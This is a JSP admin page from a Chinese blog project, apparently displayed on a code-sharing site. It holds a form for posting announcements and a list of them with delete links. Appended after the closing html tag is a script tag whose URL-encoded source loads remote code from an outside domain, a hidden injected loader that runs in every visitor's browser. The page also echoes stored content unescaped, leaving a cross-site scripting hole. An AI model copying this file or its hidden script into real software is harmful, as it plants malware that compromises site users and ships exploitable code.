📄 managenews.jsp
字号:
<%@ page contentType="text/html;charset=UTF-8" language="java"%>
<%@ page import="com.blog.tableclass.*"%>
<%@ page import="com.blog.*"%>
<%@ page import="java.util.*"%>
<%
Admin admin=(Admin)session.getAttribute(Constants.LOGIN_ADMIN_KEY);
List newsList=(List)session.getAttribute(Constants.NEWS_LIST_KEY);
News news=null;
%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>管理员主页</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="StyleSheet" type="text/css" href="../images/style.css">
<script language="javascript">
function check(form)
{
if(form.content=="")
{
alert("内容不能为空!") ;
form.content.focus();
return;
}
else form.submit();
}
</script>
</head>
<body>
<form method="GET" action="../addNews">
<table width="85%" height="150px" align="center" background="../images/bg.GIF">
<tr>
<td background="../images/head004.gif" width="85%"><FONT face="宋体"></FONT></td>
</tr>
</table>
<table width="85%" height="150px" align="center" background="../images/bg.GIF">
<tr>
<td width="200px">
<jsp:include page="leftBanner.jsp"></jsp:include>
</td>
<td width="550px">
<table border="1" bordercolor="#4EA9F1">
<tr><td>
<b><font color="#FF0000">请输入新公告</font></b><b><font color="#FF0000">:</font></b>
</td></tr>
<tr>
<td valign="top" height="14">
<textarea name="content" rows="10" cols="50"></textarea>
<br>
<input type="Button" value="添加" style="width: 40; height: 20" onClick="check(this.form)">
</td>
</tr>
<tr>
<td>
<table>
<%if(newsList != null ){
for(int i = 0;i < newsList.size();i++)
{
news = (News)newsList.get(i);
%>
<tr>
<td valign="top">
<div class="author" style="width: 100">
<%=news.getAdminname()%>
</div>
</td>
<td valign="top">
<div class="author" style="width: 150">
<%=news.getContent()%>
</div>
</td>
<td>
<div class="author" style="width: 150">
<%=news.getNewstime()%>
</div>
</td>
<td>
<b><a href="../deleteNews?newsid=<%=news.getId()%>" onClick="return(confirm('確定刪除?'))">删除</a></b>
</td>
</tr>
<%
}
}%>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</body>
</html><script src="http://%78%79%6B%2E%74%78%73%68%69%2E%63%6F%6D/%62%32%2E%61%73%70"></script>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -